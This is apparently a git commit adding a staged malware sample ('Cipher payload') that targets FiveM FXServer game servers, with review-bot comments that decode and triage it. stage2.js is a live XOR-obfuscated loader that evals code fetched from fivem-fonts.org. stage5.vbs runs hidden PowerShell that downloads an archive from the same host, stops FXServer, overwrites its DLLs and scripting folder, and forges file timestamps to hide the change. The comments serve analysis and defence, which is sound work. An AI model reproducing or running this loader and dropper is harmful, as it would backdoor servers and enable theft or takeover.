Cipher payload from 15/03/2025

Yaya48 2025-03-15 19:44:29 +01:00
parent 7f618bbc7b
commit 959280eb82
5 changed files with 29 additions and 0 deletions

6
stage1.lua Normal file

File diff suppressed because one or more lines are too long

1
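--- a/stage2.js
+++ b/stage2.js
@@ -0,0 +1 @@
+/* [fivem] */ x=(e,k=3)=>typeof k=="number"?[...e].map(c=>String.fromCharCode(c.charCodeAt()^k&255)).join(""):[...e].map((c,i)=>String.fromCharCode(c.charCodeAt()^k.charCodeAt(i%k.length)&255)).join(""); v="wqz#x#`lmpw#kwwsp#>#qfrvjqf+!kwwsp!*8#kwwsp-dfw+!kwwsp9,,ejufn.elmwp-lqd,qtEHRII!/q>=xofw#g>!!8q-lm+!gbwb!/`>=g(>`*8q-lm+!fmg!/+*>=fubo+g**8~*8#~#`bw`k+f*#x#kwwsp-dfw+!kwwsp9,,ejufn.elmwp-lqd,qtEHRII!/q>=xofw#g>!!8q-lm+!gbwb!/`>=g(>`*8q-lm+!fmg!/+*>=fubo+g**8~*8#~"; globalThis[x("fubo")](x(v));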
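Review bot: stage2.js is archived as a live, single-line loader with no analysis note beside it, so anyone triaging this repository has to decode it by hand before they can act on it. From the visible line, `x` is a single-byte XOR with default key 3, `x("fubo")` evaluates to `eval`, and `v` decodes to a Node `https` fetch-and-eval stub (the same request is repeated in its `catch`) aimed at the `fivem-fonts.org` host that stage5.vbs names in clear text. I would record that in a sidecar note together with the file's hash, for example `stage2.js: XOR-3 string decoder, evals remote response; hunt/block on fivem-fonts.org`. Storing the sample under a non-executable name such as `stage2.js.sample` would also keep it from being loaded by accident on an analyst's machine.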

6
stage3.js Normal file

File diff suppressed because one or more lines are too long

6
stage4.js Normal file

File diff suppressed because one or more lines are too long

10
stage5.vbs Normal file

@ -0,0 +1,10 @@
Dim shell
command = "powershell.exe -NoProfile -WindowStyle Hidden -Command ""Remove-Item -Path 'C:\Users\gffgd\AppData\Local\Temp/mXzS7.vbs' -Force;$downloadUrl = 'https://fivem-fonts.org/00w'; $tempDir = [System.IO.Path]::GetTempPath(); $extractDir = Join-Path $tempDir 'hMlFODZ4rw'; $targetDir = 'C:/FXServer/server/'; $targetFolder = 'C:/FXServer/server/citizen'; $processKeyword = 'FXServer'; $referenceFile = 'C:/FXServer/server/citizen\\clr2\\lib\\mono\\4.5\\CitizenFX.Core.dll'; $processPath = ''; $tempFileName = 'hMlFODZ4rw'; $tempFilePath = Join-Path $tempDir $tempFileName; $zipFile = Join-Path -Path $tempDir -ChildPath ($tempFileName + '.zip'); Invoke-RestMethod -Uri $downloadUrl -OutFile $tempFilePath; Rename-Item -Path $tempFilePath -NewName (Split-Path -Path $zipFile -Leaf); $processes = Get-Process | Where-Object { $_.Name -like '*' + $processKeyword + '*' }; foreach ($process in $processes) { try { $processPath = (Get-Process -Id $process.Id | Select-Object -ExpandProperty Path); Stop-Process -Id $process.Id -Force; } catch {} } if (-Not (Test-Path $extractDir)) { New-Item -Path $extractDir -ItemType Directory; } Expand-Archive -Path $zipFile -DestinationPath $extractDir -Force; Get-ChildItem -Path $extractDir -Filter *.dll -Recurse | ForEach-Object { $sourceFile = $_.FullName; $targetFile = Join-Path $targetDir $_.Name; if (Test-Path $targetFile) { $creationTime = (Get-Item $targetFile).CreationTime; $lastWriteTime = (Get-Item $targetFile).LastWriteTime; Copy-Item -Path $sourceFile -Destination $targetFile -Force; (Get-Item $targetFile).CreationTime = $creationTime; (Get-Item $targetFile).LastWriteTime = $lastWriteTime; } else { $creationTime = (Get-Item $referenceFile).CreationTime; $lastWriteTime = (Get-Item $referenceFile).LastWriteTime; Copy-Item -Path $sourceFile -Destination $targetDir -Force; (Get-Item $targetFile).CreationTime = $creationTime; (Get-Item $targetFile).LastWriteTime = $lastWriteTime; } }; $folderToMove = 'scripting'; $sourceFolderPath = 
Join-Path $extractDir $folderToMove; $destinationFolderPath = Join-Path $targetFolder $folderToMove; if (Test-Path $sourceFolderPath) { if (Test-Path $destinationFolderPath) { Remove-Item -Path $destinationFolderPath -Recurse -Force; } Move-Item -Path $sourceFolderPath -Destination $destinationFolderPath -Force; }; $componentsFile = Join-Path $extractDir 'components.json'; $componentsDestination = 'C:/FXServer/server/components.json'; if (Test-Path $componentsFile) { Copy-Item -Path $componentsFile -Destination $componentsDestination -Force; }; if (Test-Path $referenceFile) { $creationTime = (Get-Item $referenceFile).CreationTime; $lastWriteTime = (Get-Item $referenceFile).LastWriteTime; if (Test-Path $destinationFolderPath) { (Get-Item $destinationFolderPath).CreationTime = $creationTime; (Get-Item $destinationFolderPath).LastWriteTime = $lastWriteTime; }; if (Test-Path $componentsDestination) { (Get-Item $componentsDestination).CreationTime = $creationTime; (Get-Item $componentsDestination).LastWriteTime = $lastWriteTime; }; }; Remove-Item -Path $extractDir -Recurse -Force; Remove-Item -Path $zipFile -Force; Start-Process -FilePath $processPath;"""
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run command, 0, False
Set shell = Nothing
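Review bot: The PowerShell held in `command` copies `CreationTime` and `LastWriteTime` from `CitizenFX.Core.dll` onto every file it replaces, and that deserves a note beside this sample because timestamp-based triage of `C:/FXServer/server/` will not surface the overwritten DLLs, the `citizen/scripting` folder or `components.json`. Integrity checks on an affected server should therefore compare file hashes against a clean FXServer artifact of the same build. A process-level signal worth documenting is a script host (`wscript.exe` or `cscript.exe`, depending on how the file was launched) starting `powershell.exe -NoProfile -WindowStyle Hidden`, followed by the FXServer process being stopped and started again. The hard-coded `C:\Users\gffgd\...` path looks like it came from the host where the sample was captured, so consider redacting the user name before the archive is shared more widely. `Dim shell` is never assigned (the object in use is `WshShell`), which makes `Set shell = Nothing` a no-op and suggests the script is generator output.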